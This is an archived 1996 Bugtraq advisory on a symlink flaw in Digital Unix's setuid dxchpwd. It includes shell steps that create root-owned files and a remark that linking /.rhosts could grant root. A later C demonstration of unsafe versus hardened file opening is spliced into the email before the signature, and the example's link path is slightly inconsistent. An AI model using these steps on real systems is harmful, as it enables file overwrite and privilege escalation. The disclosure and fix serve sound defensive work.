Bugtraq mailing list archives
Digital Unix v3.x (v4.x?) security vulnerability
From: augustus () mail stic net (Eric Augustus)
Date: Sun, 17 Nov 1996 00:09:38 +0000
In Digital Unix (OSF/1) v3.x, there is a security vulnerability in the /usr/tcb/bin/dxchpwd program. The dxchpwd is installed as part of the C2 security package. The dxchpwd can be used to overwrite any file, or create a file anywhere on the system, causing a possible denial of service and possibly leading to root access.

Background:

dxchpwd is part of the C2 security package and is setuid root. It's a GUI interface for users to change their passwds. As far as I know, all Digital Unix v3.x versions are vulnerable, and possibly 4.x.

Details:

When dxchpwd is run, it creates a log file /tmp/dxchpwd.log which is root owned and mode 600. If the log file doesn't exist, it can be symlinked to any existing file, or new file on the system. New files are created root owned, mode 600. Existing files retain their permissions and ownership, but their contents are overwritten.

If a user then attempts to change a passwd, a message similar to the following is written to the log file:

    Unknown SIA Prompt: (* Permission denied. *) rendition 6

In this case, if /.rhosts were symlinked to /tmp/dxchpwd.log, then a host known as Unknown could possibly gain root access.

Example:

    $ ls -l /usr/tcb/bin/dxchpwd
    -rwsr-xr-x   1 root     bin        49152 Jul 25  1995 /usr/tcb/bin/dxchpwd
    $ ls -l /tmp/dxchpwd.log
    /tmp/dxchpwd.log not found
    $ export DISPLAY=:0          (or a remotehost)
    $ ln -s /hackfile /tmp/dxchpwd
    $ ls -l /hackfile
    /hackfile not found
    $ /usr/tcb/bin/dxchpwd

(The dxchpwd window will appear. Just enter root for username and anything for the passwd. You'll get a permission denied message and the window will close.)

    $ ls -l /hackfile
    -rw-------   1 root     system         0 Nov 16 22:44 /hackfile

Fix:

Make sure /tmp/dxchpwd.log exists, which is root owned and at least mode 600 until a patch is available. Of course, the setuid bit could be removed, but then users couldn't use it to change their passwds.
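The flaw class in the post is a setuid program creating a fixed-name log file under /tmp by path, so a symlink planted at that name redirects the create/truncate to whatever the link points at. The following is an added example (not code from Eric Augustus's post or from Digital's dxchpwd) that contrasts that open pattern with a hardened opener. It assumes a modern POSIX.1-2008 system with O_NOFOLLOW, which 1996 Digital Unix did not offer, and it builds the scenario in a constructed temporary directory with made-up file names rather than touching /tmp/dxchpwd.log or any real system file.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Added example, not code from the advisory or from Digital's dxchpwd.
 * Demonstrates the flaw class (a privileged program creating a fixed-name
 * log file under /tmp by path) next to a hardened opener. Everything runs
 * in a constructed temporary directory; no real system file is touched. */

/* The pattern the advisory describes: open by name, create if missing,
 * and follow whatever the path resolves to. A symlink planted at 'path'
 * redirects the create/truncate to the link's target. */
int open_log_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened variant (assumes a POSIX.1-2008 system with O_NOFOLLOW):
 * never follow a symlink at the final component, append rather than
 * truncate, and verify what was actually opened before using it. */
int open_log_safe(const char *path)
{
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;                     /* ELOOP when 'path' is a symlink */
    struct stat st;
    if (fstat(fd, &st) < 0
        || !S_ISREG(st.st_mode)        /* not a device, fifo, directory ... */
        || st.st_nlink != 1            /* not a planted hard link */
        || st.st_uid != geteuid()      /* owned by us, not pre-created by another user */
        || (st.st_mode & 077) != 0) {  /* not group- or world-accessible */
        close(fd);
        return -1;
    }
    return fd;
}

/* Scenario builder: a fresh temp dir holding the name "dxchpwd.log". With
 * plant_link set, that name is a dangling symlink to "victim" (the file the
 * attacker wants created). Returns a bitmask: bit 0 = opener succeeded,
 * bit 1 = "victim" came into existence. Returns -1 if no temp dir could be made. */
int run_scenario(int (*opener)(const char *), int plant_link)
{
    char dir[PATH_MAX] = "/tmp/dxchpwd-demo-XXXXXX";
    if (mkdtemp(dir) == NULL) {
        snprintf(dir, sizeof dir, "./dxchpwd-demo-XXXXXX");
        if (mkdtemp(dir) == NULL)
            return -1;
    }
    char log[PATH_MAX], victim[PATH_MAX];
    snprintf(log, sizeof log, "%s/dxchpwd.log", dir);
    snprintf(victim, sizeof victim, "%s/victim", dir);
    if (plant_link && symlink(victim, log) < 0)
        return -1;

    int result = 0;
    int fd = opener(log);
    if (fd >= 0) {
        result |= 1;
        close(fd);
    }
    if (access(victim, F_OK) == 0)
        result |= 2;

    unlink(victim); unlink(log); rmdir(dir);   /* clean up the constructed dir */
    return result;
}

/* 1 if the unsafe opener created the symlink's target (the advisory's bug). */
int unsafe_follows_symlink(void) { return run_scenario(open_log_unsafe, 1) == 3; }
/* 1 if the hardened opener refused the symlink and created nothing. */
int safe_refuses_symlink(void)   { return run_scenario(open_log_safe, 1) == 0; }
/* 1 if the hardened opener still works on an honest, unplanted path. */
int safe_opens_plain_file(void)  { return run_scenario(open_log_safe, 0) == 1; }

int main(void)
{
    printf("unsafe opener followed symlink: %d\n", unsafe_follows_symlink());
    printf("safe opener refused symlink:    %d\n", safe_refuses_symlink());
    printf("safe opener on plain file:      %d\n", safe_opens_plain_file());
    return 0;
}
```

The post's interim fix (pre-creating /tmp/dxchpwd.log as a root-owned mode 600 file) works on the same principle as the hardened opener: once a regular file already occupies the name, an unprivileged user can no longer put a symlink there, so the open lands on the intended file. The fstat checks after the open are what a patched program would need so that it does not depend on the administrator having done that by hand.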
Gus
--
_________________________________________________________________________
Eric Augustus
1211 Saxonhill Drive
San Antonio, TX 78253
(210) 679-6497
augustus () stic net
_____________________ #INCLUDE <std_disclaimer.h> _______________________
You May Be an Engineer if... people groan at the party when you pick out the music